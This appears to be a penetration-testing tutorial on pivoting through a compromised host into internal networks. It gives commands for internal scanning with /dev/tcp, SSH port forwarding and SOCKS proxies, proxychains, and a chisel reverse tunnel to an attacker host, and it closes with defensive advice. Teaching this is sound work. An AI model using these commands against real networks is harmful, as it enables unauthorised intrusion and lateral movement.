Skip to content

Pivoting and Tunneling

You rarely compromise your final target directly. The norm is to take an exposed machine (DMZ, web server) and use it as a springboard to reach internal networks not accessible from outside. Pivoting is using a compromised host as a bridge into those networks, and tunnels are the mechanisms (port forwarding, SOCKS, VPN) that carry your traffic through it. Without pivoting, an internal pentest stops at the first machine.

flowchart LR
    A[Attacker] -->|"tunnel / proxy (SOCKS)"| H["Compromised host (pivot)"]
    H -->|"access"| N["Non-routable internal network"]

The compromised host has access to networks you don’t: another interface, an internal subnet, a firewall that lets it out. Pivoting reuses that access. Two forms: port forwarding (redirect a specific port) and a SOCKS proxy (route any traffic/tool through the pivot).

First, what can the compromised host reach?

ip a ; ip route # other interfaces/subnets
arp -a ; cat /etc/hosts # known neighbors
# light scan of the internal network from the pivot (without uploading nmap)
for i in $(seq 1 254); do (echo >/dev/tcp/10.10.10.$i/445) 2>/dev/null && echo "10.10.10.$i:445"; done

If you have SSH, you have almost everything:

# Local port forward: a local port -> internal service via the pivot
ssh -L 8080:10.10.10.5:80 user@pivot # your localhost:8080 = internal:80
# Remote port forward: expose a port of yours on the pivot
ssh -R 9001:localhost:9001 user@pivot
# Dynamic (SOCKS proxy): route ANY tool into the internal network
ssh -D 1080 user@pivot # SOCKS on localhost:1080

Then, with proxychains, any tool exits through the SOCKS:

# /etc/proxychains.conf -> socks5 127.0.0.1 1080
proxychains nmap -sT -Pn 10.10.10.5
proxychains nxc smb 10.10.10.0/24
chisel HTTP server/client -> reverse SOCKS (widely used; upload a binary to the pivot)
# attacker: chisel server -p 8000 --reverse
# pivot: chisel client ATTACKER:8000 R:socks
ligolo-ng tunnel with a TUN interface -> the internal network "appears" as a local interface (convenient)
sshuttle "VPN over SSH" -> transparently routes the internal subnet
socat / netcat one-off port relays
metasploit route add + socks_proxy (autoroute)

ligolo-ng and sshuttle stand out for convenience: they route whole subnets without configuring proxychains per tool.

Sometimes the target is two hops away: you compromise A (DMZ) → from A you reach B (internal) → from B to C (deeper internal). Tunnels are chained (SSH -J, nested chisel/ligolo) to reach ever-deeper networks.

  • Strict segmentation: a DMZ host shouldn’t reach the internal network; microsegmentation.
  • Egress filtering: limit what outbound connections each host can make (stops reverse SOCKS/C2).
  • Detection: unusual outbound connections (chisel/ligolo to external IPs), tunneled traffic, a host scanning internally.
  • EDR/NDR detecting tunneling binaries and pivoting patterns; internal honeypots.
  • Principle: a compromised host shouldn’t be able to become a bridge to the critical.
  • Enumerate which networks/interfaces the pivot reaches
  • Light scan of the internal network from the pivot
  • SSH port forward (local/remote) to an internal service
  • Dynamic SOCKS (ssh -D / chisel / ligolo) + proxychains
  • Route your tools into the internal network (nmap/nxc)
  • Chained pivoting if the target is several hops away
  • Blue: do segmentation and egress filtering limit the pivot?
  • Document the internal subnets reached